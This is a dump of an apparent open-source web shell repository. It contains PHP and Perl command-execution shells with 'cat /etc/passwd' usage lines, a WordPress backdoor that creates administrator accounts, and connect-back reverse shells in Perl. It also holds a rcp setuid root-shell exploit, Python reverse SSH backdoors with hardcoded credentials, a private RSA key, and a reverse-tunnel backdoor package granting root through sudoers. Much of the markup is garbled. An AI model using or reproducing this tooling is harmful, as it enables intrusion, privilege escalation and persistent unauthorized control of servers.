https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/safe0ver.php


--------------------------------------------------------------------------------
/Php/simple-backdoor.php:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | ";
 7 |         $cmd = ($_REQUEST['cmd']);
 8 |         system($cmd);
 9 |         echo "
    "; 10 | die; 11 | } 12 | 13 | ?> 14 | 15 | Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd 16 | 17 | 18 | -------------------------------------------------------------------------------- /Php/simple_cmd.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | G-Security Webshell 4 | 5 | 6 | 7 |
    8 |
    9 | 11 |
    12 | 
    13 | 
14 | 
15 |
    16 |
    17 | 18 | 7 | Server: 8 | 9 | \r\n"; 21 | $out .= "Connection: close\r\n\r\n"; 22 | fwrite($fp,$out); 23 | while(!feof($fp)){ 24 | $resp_str=""; 25 | $resp_str .= fgets($fp,512);//返回值放入$resp_str 26 | } 27 | fclose($fp); 28 | echo($resp_str);//处理返回值. 29 | ?> 30 | 对服务端与客户端指令对比,如一致则执行后门指令。 -------------------------------------------------------------------------------- /Php/tryag.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/tryag.php -------------------------------------------------------------------------------- /Php/udf.dll 专用网马.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/udf.dll 专用网马.php -------------------------------------------------------------------------------- /Php/up.php: -------------------------------------------------------------------------------- 1 | 11 | 12 | 13 | 14 |
    15 | 16 |

    Local File: 17 |

    Remote File: 18 | 19 |




    20 | 21 | 31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /Php/wordpress backdoor.php: -------------------------------------------------------------------------------- 1 | set_role( 'administrator' ); 10 | } else { 11 | die("User already exists..."); 12 | } 13 | } 14 | } -------------------------------------------------------------------------------- /Php/www.zjjv.com.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/www.zjjv.com.php -------------------------------------------------------------------------------- /Php/上传马.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/上传马.php -------------------------------------------------------------------------------- /Php/中国木马资源网-WwW.MumaSec.TK.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/中国木马资源网-WwW.MumaSec.TK.php -------------------------------------------------------------------------------- /Php/中转bypass/client1.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/中转bypass/client1.php -------------------------------------------------------------------------------- /Php/中转bypass/server1.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Php/中转bypass/server2.php: -------------------------------------------------------------------------------- 1 | 66 | -------------------------------------------------------------------------------- /Php/仗剑孤行搜索可读可写目录脚本.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/仗剑孤行搜索可读可写目录脚本.php -------------------------------------------------------------------------------- /Php/图片一句话/404.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/图片一句话/404.php -------------------------------------------------------------------------------- /Php/图片一句话/JFIF.jpg: -------------------------------------------------------------------------------- 1 | JFIF  2 | 3 | -------------------------------------------------------------------------------- /Php/图片一句话/gif89a.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/图片一句话/gif89a.jpg -------------------------------------------------------------------------------- /Php/图片一句话/phppng.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/图片一句话/phppng.png -------------------------------------------------------------------------------- /Php/图片一句话/xx.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/图片一句话/xx.png -------------------------------------------------------------------------------- /Php/图片一句话/图片马.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/图片一句话/图片马.jpg -------------------------------------------------------------------------------- /Php/数据库/Adminer - Compact database management.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/数据库/Adminer - Compact database management.php -------------------------------------------------------------------------------- /Php/极其隐蔽的pHp小马穿插在正常页面中.php: -------------------------------------------------------------------------------- 1 | 7 |
    -------------------------------------------------------------------------------- /Php/菊花聊天室.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Php/菊花聊天室.php -------------------------------------------------------------------------------- /Pl/Cgitelnet.pl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Pl/Cgitelnet.pl -------------------------------------------------------------------------------- /Pl/Silic Group_cgi.pl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Pl/Silic Group_cgi.pl -------------------------------------------------------------------------------- /Pl/Silic Group_readme.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Pl/Silic Group_readme.txt -------------------------------------------------------------------------------- /Pl/cmd.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | # 3 | # PerlKit-0.1 - http://www.t0s.org 4 | # 5 | # cmd.pl: Run commands on a webserver 6 | 7 | use strict; 8 | 9 | my ($cmd, %FORM); 10 | 11 | $|=1; 12 | 13 | print "Content-Type: text/html\r\n"; 14 | print "\r\n"; 15 | 16 | # Get parameters 17 | 18 | %FORM = parse_parameters($ENV{'QUERY_STRING'}); 19 | 20 | if(defined $FORM{'cmd'}) { 21 | $cmd = $FORM{'cmd'}; 22 | } 23 | 24 | print ' 25 | 26 |
    27 | 28 | 29 |
    30 | 
    ';
31 | 
32 | if(defined $FORM{'cmd'}) {
33 |   print "Results of '$cmd' execution:\n\n";
34 |   print "-"x80;
35 |   print "\n";
36 | 
37 |   open(CMD, "($cmd) 2>&1 |") || print "Could not execute command";
38 | 
39 |   while() {
40 |     print;
41 |   }
42 | 
43 |   close(CMD);
44 |   print "-"x80;
45 |   print "\n";
46 | }
47 | 
48 | print "
    "; 49 | 50 | sub parse_parameters ($) { 51 | my %ret; 52 | 53 | my $input = shift; 54 | 55 | foreach my $pair (split('&', $input)) { 56 | my ($var, $value) = split('=', $pair, 2); 57 | 58 | if($var) { 59 | $value =~ s/\+/ /g ; 60 | $value =~ s/%(..)/pack('c',hex($1))/eg; 61 | 62 | $ret{$var} = $value; 63 | } 64 | } 65 | 66 | return %ret; 67 | } 68 | -------------------------------------------------------------------------------- /Pl/dc.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | use IO::Socket; 3 | #cONNECT BACKDOOR EDITED BY XORON 4 | #lord@SlackwareLinux:/home/programing$ perl dc.pl 5 | #--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- 6 | # 7 | #Usage: dc.pl [Host] [Port] 8 | # 9 | #Ex: dc.pl 127.0.0.1 2121 10 | #lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121 11 | #--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==-- 12 | # 13 | #[*] Resolving HostName 14 | #[*] Connecting... 127.0.0.1 15 | #[*] Spawning Shell 16 | #[*] Connected to remote host 17 | 18 | #bash-2.05b# nc -vv -l -p 2121 19 | #listening on [any] 2121 ... 20 | #connect to [127.0.0.1] from localhost [127.0.0.1] 32769 21 | #--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==-- 22 | # 23 | #--==Systeminfo==-- 24 | #Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux 25 | # 26 | #--==Userinfo==-- 27 | #uid=1001(xoron) gid=100(users) groups=100(users) 28 | # 29 | #--==Directory==-- 30 | #/root 31 | # 32 | #--==Shell==-- 33 | # 34 | $system = '/bin/sh'; 35 | $ARGC=@ARGV; 36 | print "--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==-- \n\n"; 37 | if ($ARGC!=2) { 38 | print "Usage: $0 [Host] [Port] \n\n"; 39 | die "Ex: $0 127.0.0.1 2121 \n"; 40 | } 41 | use Socket; 42 | use FileHandle; 43 | socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; 44 | connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; 45 | print "[*] Resolving HostName\n"; 46 | print "[*] Connecting... $ARGV[0] \n"; 47 | print "[*] Spawning Shell \n"; 48 | print "[*] Connected to remote host \n"; 49 | SOCKET->autoflush(); 50 | open(STDIN, ">&SOCKET"); 51 | open(STDOUT,">&SOCKET"); 52 | open(STDERR,">&SOCKET"); 53 | print "--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==-- \n\n"; 54 | system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; uname -a;echo; 55 | echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-- "); 56 | system($system); 57 | #EOF -------------------------------------------------------------------------------- /Pl/exim.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | $cnt = 0xbffffa10; 4 | 5 | while (1) { 6 | $hex = sprintf ("0x%x", $cnt); 7 | $res = system ("./exploit $hex"); 8 | printf "$hex : $res\n"; 9 | $cnt += 4; 10 | } 11 | 12 | -------------------------------------------------------------------------------- /Pl/hmass (priv8 mass defacor).pl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Pl/hmass (priv8 mass defacor).pl -------------------------------------------------------------------------------- /Pl/perlcmd.cgi: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | 3 | use strict; 4 | 5 | print "Cache-Control: no-cache\n"; 6 | print "Content-type: text/html\n\n"; 7 | 8 | my $req = $ENV{QUERY_STRING}; 9 | chomp ($req); 10 | $req =~ s/%20/ /g; 11 | $req =~ s/%3b/;/g; 12 | 13 | print ""; 14 | 15 | print ''; 16 | 17 | if (!$req) { 18 | print "Usage: http://target.com/perlcmd.cgi?cat /etc/passwd"; 19 | } 20 | else { 21 | print "Executing: $req"; 22 | } 23 | 24 | print "
    ";
25 | 	my @cmd = `$req`;
26 | 	print "
    "; 27 | 28 | foreach my $line (@cmd) { 29 | print $line . "
    "; 30 | } 31 | 32 | print ""; 33 | 34 | # 35 | -------------------------------------------------------------------------------- /Pl/rcpexp.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | 3 | $RCPFILE="/usr/bin/rcp" ; 4 | 5 | sub USAGE 6 | { 7 | printf "Starting RCP Exploit" ; 8 | exit 0 ; 9 | } 10 | 11 | if ( ! -u "$RCPFILE" ) 12 | { 13 | printf "RCP is not suid, quiting\n" ; 14 | exit 0; 15 | } 16 | 17 | open(TEMP, ">>/tmp/shell.c")|| die "Something went wrong: $!" ; 18 | printf TEMP "#include\n#include\nint main()\n{" ; 19 | printf TEMP " setuid(0);\n\tsetgid(0);\n\texecl(\"/bin/sh\",\"sh\",0);\n\treturn 0;\n}\n" ; 20 | close(TEMP); 21 | open(HMM, ">hey")|| die "Something went wrong: $!"; 22 | close(HMM); 23 | 24 | system "rcp 'hey geezer; gcc -o /tmp/shell /tmp/shell.c;' localhost 2> /dev/null" ; 25 | system "rcp 'hey geezer; chmod +s /tmp/shell;' localhost 2> /dev/null" ; 26 | unlink("/tmp/shell.c"); 27 | unlink("hey"); 28 | unlink("geezer"); 29 | printf "Ok, launching a rootshell, lets hope shit went well ... \n" ; 30 | exec '/tmp/shell' ; 31 | #EOF 32 | -------------------------------------------------------------------------------- /Pl/remot shell.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | # 4 | 5 | # Asmodeus v0.1 6 | 7 | # Perl Remote Shell 8 | 9 | # by phuket 10 | 11 | # www.smoking-gnu.org 12 | 13 | # 14 | 15 | # (Server is based on some code found on [url=http://www.governmentsecurity.org)]www.governmentsecurity.org)[/url] 16 | 17 | # 18 | 19 | 20 | 21 | # perl asmodeus.pl client 6666 127.0.0.1 22 | 23 | # perl asmodeus.pl server 6666 24 | 25 | # 26 | 27 | 28 | 29 | 30 | 31 | use Socket; 32 | 33 | 34 | 35 | $cs=$ARGV[0]; 36 | 37 | $port=$ARGV[1]; 38 | 39 | $host=$ARGV[2]; 40 | 41 | 42 | 43 | if ($cs eq 'client') {&client} 44 | 45 | elsif ($cs eq 'server') {&server} 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | sub client{ 56 | 57 | socket(TO_SERVER, PF_INET, SOCK_STREAM, getprotobyname('tcp')); 58 | 59 | $internet_addr = inet_aton("$host") or die "ALOA:$!\n"; 60 | 61 | $paddr=sockaddr_in("$port", $internet_addr); 62 | 63 | connect(TO_SERVER, $paddr) or die "$port:$internet_addr:$!\n"; 64 | 65 | open(STDIN, ">&TO_SERVER"); 66 | 67 | open(STDOUT, ">&TO_SERVER"); 68 | 69 | open(STDERR, ">&TO_SERVER"); 70 | 71 | print "Asmodeus Perl Remote Shell\n"; 72 | 73 | system(date); 74 | 75 | system("/bin/sh"); 76 | 77 | close(TO_SERVER); 78 | 79 | } 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | sub server{ 92 | 93 | $proto=getprotobyname('tcp'); 94 | 95 | $0="asm"; 96 | 97 | $system='/bin/sh'; 98 | 99 | socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!"; 100 | 101 | setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!"; 102 | 103 | bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!"; 104 | 105 | listen(SERVER, SOMAXCONN) or die "listen: $!"; 106 | 107 | for(;$paddr=accept(CLIENT, SERVER);close CLIENT) { 108 | 109 | open(STDIN, ">&CLIENT"); 110 | 111 | open(STDOUT, ">&CLIENT"); 112 | 113 | open(STDERR, ">&CLIENT"); 114 | 115 | print "Asmodeus Perl Remote Shell\n"; 116 | 117 | system(date); 118 | 119 | system("/bin/sh"); 120 | 121 | close(STDIN); 122 | 123 | close(STDOUT); 124 | 125 | close(STDERR); 126 | 127 | return; 128 | 129 | } 130 | 131 | } -------------------------------------------------------------------------------- /Pl/telnet.cgi.pl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Pl/telnet.cgi.pl -------------------------------------------------------------------------------- /Pl/telnet.pl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Pl/telnet.pl -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # WebShell 2 | This is a webshell open source project https://github.com/xl7dev/WebShell 3 | 4 | ## Category 5 | - Aar 6 | - Ascx 7 | - Ashx 8 | - Asmx 9 | - Asp 10 | - Aspx 11 | - C 12 | - Cfm 13 | - Cgi 14 | - Javascript 15 | - Jsp 16 | - Jspx 17 | - LICENSE 18 | - Mysql 19 | - Nginx 20 | - Other 21 | - Php 22 | - Pl 23 | - README.md 24 | - SSH 25 | - Soap 26 | - Udp 27 | - WeBaCoo 28 | - gdog 29 | - icmp 30 | - jar 31 | - nodejs 32 | - openfire 33 | - osx 34 | - pwnginx 35 | - python 36 | - reGeorg-master 37 | - ruby 38 | - servlet 39 | - sh 40 | - war 41 | - xml 42 | - xssshell 43 | 44 | Author: 小乐天 45 | -------------------------------------------------------------------------------- /SSH/ReverseSSH-Backdoor/Readme.txt: -------------------------------------------------------------------------------- 1 | This is derived from InfosecInstitute. 2 | Requires Paramiko Lib at both Ends. 3 | More Information Here: http://resources.infosecinstitute.com/creating-undetectable-custom-ssh-backdoor-python-z/ -------------------------------------------------------------------------------- /SSH/ReverseSSH-Backdoor/revsshclient.py: -------------------------------------------------------------------------------- 1 | import paramiko 2 | import threading 3 | import subprocess 4 | 5 | client = paramiko.SSHClient() 6 | client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 7 | client.connect('*insertServerIPHere*', username='root', password='toor') 8 | chan = client.get_transport().open_session() 9 | chan.send('Hey i am connected :) ') 10 | print chan.recv(1024) 11 | command = chan.recv(1024) 12 | try: 13 | CMD = subprocess.check_output(command, shell=True) 14 | chan.send(CMD) 15 | except Exception,e: 16 | chan.send(str(e)) 17 | client.close 18 | -------------------------------------------------------------------------------- /SSH/ReverseSSH-Backdoor/revsshserver.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import paramiko 3 | import threading 4 | import sys 5 | 6 | host_key = paramiko.RSAKey(filename='/usr/share/doc/python-paramiko/examples/test_rsa.key') 7 | 8 | class Server (paramiko.ServerInterface): 9 | def _init_(self): 10 | self.event = threading.Event() 11 | def check_channel_request(self, kind, chanid): 12 | if kind == 'session': 13 | return paramiko.OPEN_SUCCEEDED 14 | return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED 15 | def check_auth_password(self, username, password): 16 | if (username == 'root') and (password == 'toor'): 17 | return paramiko.AUTH_SUCCESSFUL 18 | return paramiko.AUTH_FAILED 19 | 20 | try: 21 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 22 | sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 23 | sock.bind(('*insertClientIPHere*', 22)) 24 | sock.listen(100) 25 | print '[+] Listening for connection ...' 26 | client, addr = sock.accept() 27 | except Exception, e: 28 | print '[-] Listen/bind/accept failed: ' + str(e) 29 | sys.exit(1) 30 | print '[+] Got a connection!' 31 | 32 | try: 33 | t = paramiko.Transport(client) 34 | try: 35 | t.load_server_moduli() 36 | except: 37 | print '[-] (Failed to load moduli -- gex will be unsupported.)' 38 | raise 39 | t.add_server_key(host_key) 40 | server = Server() 41 | try: 42 | t.start_server(server=server) 43 | except paramiko.SSHException, x: 44 | print '[-] SSH negotiation failed.' 45 | 46 | chan = t.accept(20) 47 | print '[+] Authenticated!' 48 | print chan.recv(1024) 49 | chan.send('Yeah i can see this') 50 | command= raw_input("Enter command: ").strip('\n') 51 | chan.send(command) 52 | print chan.recv(1024) + '\n' 53 | 54 | except Exception, e: 55 | print '[-] Caught exception: '': ' + str(e) 56 | try: 57 | t.close() 58 | except: 59 | pass 60 | sys.exit(1) 61 | -------------------------------------------------------------------------------- /SSH/custom-ssh-backdoor/README.md: -------------------------------------------------------------------------------- 1 | SSH Backdoor using Paramiko 2 | 3 | Example: 4 | 5 | ![](print.png) -------------------------------------------------------------------------------- /SSH/custom-ssh-backdoor/client.py: -------------------------------------------------------------------------------- 1 | import paramiko 2 | import threading 3 | import subprocess 4 | 5 | client = paramiko.SSHClient() 6 | client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 7 | client.connect('192.168.1.100', username='joridos', password='olh234') 8 | chan = client.get_transport().open_session() 9 | chan.send('Hey i am connected :) ') 10 | while True: 11 | command = chan.recv(1024) 12 | try: 13 | CMD = subprocess.check_output(command, shell=True) 14 | chan.send(CMD) 15 | except Exception,e: 16 | chan.send(str(e)) 17 | print chan.recv(1024) 18 | client.close -------------------------------------------------------------------------------- /SSH/custom-ssh-backdoor/print.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/SSH/custom-ssh-backdoor/print.png -------------------------------------------------------------------------------- /SSH/custom-ssh-backdoor/server.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import paramiko 3 | import threading 4 | import sys 5 | 6 | host_key = paramiko.RSAKey(filename='/home/joridos/custom-ssh-backdoor/test_rsa.key') 7 | 8 | class Server (paramiko.ServerInterface): 9 | def _init_(self): 10 | self.event = threading.Event() 11 | def check_channel_request(self, kind, chanid): 12 | if kind == 'session': 13 | return paramiko.OPEN_SUCCEEDED 14 | return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED 15 | def check_auth_password(self, username, password): 16 | if (username == 'joridos') and (password == 'olh234'): 17 | return paramiko.AUTH_SUCCESSFUL 18 | return paramiko.AUTH_FAILED 19 | 20 | try: 21 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 22 | sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 23 | sock.bind(('192.168.1.100', 22)) 24 | sock.listen(100) 25 | print '[+] Listening for connection ...' 26 | client, addr = sock.accept() 27 | except Exception, e: 28 | print '[-] Listen/bind/accept failed: ' + str(e) 29 | sys.exit(1) 30 | print '[+] Got a connection!' 31 | 32 | try: 33 | t = paramiko.Transport(client) 34 | try: 35 | t.load_server_moduli() 36 | except: 37 | print '[-] (Failed to load moduli -- gex will be unsupported.)' 38 | raise 39 | t.add_server_key(host_key) 40 | server = Server() 41 | try: 42 | t.start_server(server=server) 43 | except paramiko.SSHException, x: 44 | print '[-] SSH negotiation failed.' 45 | 46 | chan = t.accept(20) 47 | print '[+] Authenticated!' 48 | print chan.recv(1024) 49 | while True: 50 | command= raw_input("Enter command: ").strip('n') 51 | chan.send(command) 52 | print chan.recv(1024) + 'n' 53 | 54 | except Exception, e: 55 | print '[-] Caught exception: ' + str(e) + ': ' + str(e) 56 | try: 57 | t.close() 58 | except: 59 | pass 60 | sys.exit(1) -------------------------------------------------------------------------------- /SSH/custom-ssh-backdoor/test_rsa.key: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | MIICWgIBAAKBgQDTj1bqB4WmayWNPB+8jVSYpZYk80Ujvj680pOTh2bORBjbIAyz 3 | oWGW+GUjzKxTiiPvVmxFgx5wdsFvF03v34lEVVhMpouqPAYQ15N37K/ir5XY+9m/ 4 | d8ufMCkjeXsQkKqFbAlQcnWMCRnOoPHS3I4vi6hmnDDeeYTSRvfLbW0fhwIBIwKB 5 | gBIiOqZYaoqbeD9OS9z2K9KR2atlTxGxOJPXiP4ESqP3NVScWNwyZ3NXHpyrJLa0 6 | EbVtzsQhLn6rF+TzXnOlcipFvjsem3iYzCpuChfGQ6SovTcOjHV9z+hnpXvQ/fon 7 | soVRZY65wKnF7IAoUwTmJS9opqgrN6kRgCd3DASAMd1bAkEA96SBVWFt/fJBNJ9H 8 | tYnBKZGw0VeHOYmVYbvMSstssn8un+pQpUm9vlG/bp7Oxd/m+b9KWEh2xPfv6zqU 9 | avNwHwJBANqzGZa/EpzF4J8pGti7oIAPUIDGMtfIcmqNXVMckrmzQ2vTfqtkEZsA 10 | 4rE1IERRyiJQx6EJsz21wJmGV9WJQ5kCQQDwkS0uXqVdFzgHO6S++tjmjYcxwr3g 11 | H0CoFYSgbddOT6miqRskOQF3DZVkJT3kyuBgU2zKygz52ukQZMqxCb1fAkASvuTv 12 | qfpH87Qq5kQhNKdbbwbmd2NxlNabazPijWuphGTdW0VfJdWfklyS2Kr+iqrs/5wV 13 | HhathJt636Eg7oIjAkA8ht3MQ+XSl9yIJIS8gVpbPxSw5OMfw0PjVE7tBdQruiSc 14 | nvuQES5C9BMHjF39LZiGH1iLQy7FgdHyoP+eodI7 15 | -----END RSA PRIVATE KEY----- 16 | -------------------------------------------------------------------------------- /SSH/sidedoor/config: -------------------------------------------------------------------------------- 1 | Host * 2 | # Tunneled traffic (e.g., SSH) is encrypted and thus not compressible. 3 | Compression no 4 | 5 | # Disable password authentication. 6 | BatchMode yes 7 | 8 | # Terminate if unable to set up port forwarding. 9 | ExitOnForwardFailure yes 10 | 11 | # Enable SSH keepalives. 12 | ServerAliveInterval 30 13 | 14 | # Disconnect after unresponsive SSH keepalives. 15 | ServerAliveCountMax 2 16 | 17 | # Enable TCP keepalives. 18 | TCPKeepAlive yes 19 | -------------------------------------------------------------------------------- /SSH/sidedoor/debian/changelog: -------------------------------------------------------------------------------- 1 | sidedoor (0.1) UNRELEASED; urgency=low 2 | 3 | * Initial Release. 4 | 5 | -- Dara Adib Thu, 31 Dec 2015 16:35:12 -0500 6 | -------------------------------------------------------------------------------- /SSH/sidedoor/debian/compat: -------------------------------------------------------------------------------- 1 | 9 2 | -------------------------------------------------------------------------------- /SSH/sidedoor/debian/control: -------------------------------------------------------------------------------- 1 | Source: sidedoor 2 | Section: net 3 | Priority: optional 4 | Maintainer: Dara Adib 5 | Build-Depends: debhelper (>= 9), dh-systemd 6 | Standards-Version: 3.9.6 7 | Homepage: https://github.com/daradib/sidedoor 8 | Vcs-Git: https://github.com/daradib/sidedoor.git 9 | Vcs-Browser: https://github.com/daradib/sidedoor 10 | 11 | Package: sidedoor 12 | Architecture: all 13 | Depends: ${misc:Depends}, adduser, systemd | upstart, autossh 14 | Recommends: openssh-server 15 | Description: Backdoor using a reverse tunnel 16 | sidedoor maintains a reverse tunnel to provide a backdoor. 17 | sidedoor can be used to remotely control a device behind a NAT. 18 | . 19 | To use, set up SSH keys to 20 | (1) access a remote server, and, 21 | (2) if tunneling SSH, control access to the local sidedoor user. 22 | . 23 | The sidedoor user has full root access configured in /etc/sudoers.d. 24 | -------------------------------------------------------------------------------- /SSH/sidedoor/debian/copyright: -------------------------------------------------------------------------------- 1 | Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/ 2 | Upstream-Name: sidedoor 3 | Source: https://github.com/daradib/sachesi 4 | 5 | Files: * 6 | Copyright: 2015 Dara Adib 7 | License: GPL-3.0+ 8 | 9 | License: GPL-3.0+ 10 | This program is free software: you can redistribute it and/or modify 11 | it under the terms of the GNU General Public License as published by 12 | the Free Software Foundation, either version 3 of the License, or 13 | (at your option) any later version. 14 | . 15 | This package is distributed in the hope that it will be useful, 16 | but WITHOUT ANY WARRANTY; without even the implied warranty of 17 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 18 | GNU General Public License for more details. 19 | . 20 | You should have received a copy of the GNU General Public License 21 | along with this program. If not, see . 22 | . 23 | On Debian systems, the complete text of the GNU General 24 | Public License version 3 can be found in "/usr/share/common-licenses/GPL-3". 25 | -------------------------------------------------------------------------------- /SSH/sidedoor/debian/rules: -------------------------------------------------------------------------------- 1 | #!/usr/bin/make -f 2 | 3 | %: 4 | dh $@ --with systemd 5 | -------------------------------------------------------------------------------- /SSH/sidedoor/debian/sidedoor.default: -------------------------------------------------------------------------------- 1 | # Configuration for sidedoor service 2 | 3 | # Remote SSH server to connect to, i.e., [user@]hostname. 4 | REMOTE_SERVER= 5 | 6 | # Port on the remote server to tunnel to local port. 7 | TUNNEL_PORT= 8 | 9 | # Local port to provide access to. 10 | # If unset, looks for port in /etc/ssh/sshd_config. 11 | #LOCAL_PORT=22 12 | -------------------------------------------------------------------------------- /SSH/sidedoor/debian/sidedoor.dirs: -------------------------------------------------------------------------------- 1 | etc/sidedoor 2 | var/lib/sidedoor 3 | -------------------------------------------------------------------------------- /SSH/sidedoor/debian/sidedoor.docs: -------------------------------------------------------------------------------- 1 | README.md 2 | -------------------------------------------------------------------------------- /SSH/sidedoor/debian/sidedoor.install: -------------------------------------------------------------------------------- 1 | config etc/sidedoor 2 | sudoers etc/sudoers.d 3 | sidedoor usr/bin 4 | -------------------------------------------------------------------------------- /SSH/sidedoor/debian/sidedoor.links: -------------------------------------------------------------------------------- 1 | etc/sidedoor var/lib/sidedoor/.ssh 2 | -------------------------------------------------------------------------------- /SSH/sidedoor/debian/sidedoor.postinst: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | set -e 4 | 5 | if [ "$1" = configure ]; then 6 | adduser --quiet --system --no-create-home --group \ 7 | --home /var/lib/sidedoor \ 8 | --shell /bin/sh \ 9 | sidedoor 10 | passwd --quiet --lock sidedoor 11 | fi 12 | 13 | #DEBHELPER# 14 | -------------------------------------------------------------------------------- /SSH/sidedoor/debian/sidedoor.postrm: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | set -e 4 | 5 | #DEBHELPER# 6 | 7 | if [ "$1" = remove ]; then 8 | rm -f /etc/sudoers.d/sidedoor 9 | fi 10 | 11 | if [ "$1" = purge ]; then 12 | deluser --quiet --system sidedoor || true 13 | rm -rf /var/lib/sidedoor 14 | fi 15 | -------------------------------------------------------------------------------- /SSH/sidedoor/debian/sidedoor.service: -------------------------------------------------------------------------------- 1 | [Unit] 2 | Description=maintain reverse tunnel 3 | After=local-fs.target network.target 4 | 5 | [Service] 6 | User=sidedoor 7 | EnvironmentFile=-/etc/default/sidedoor 8 | ExecStart=/usr/bin/sidedoor "$REMOTE_SERVER" "$TUNNEL_PORT" "$LOCAL_PORT" 9 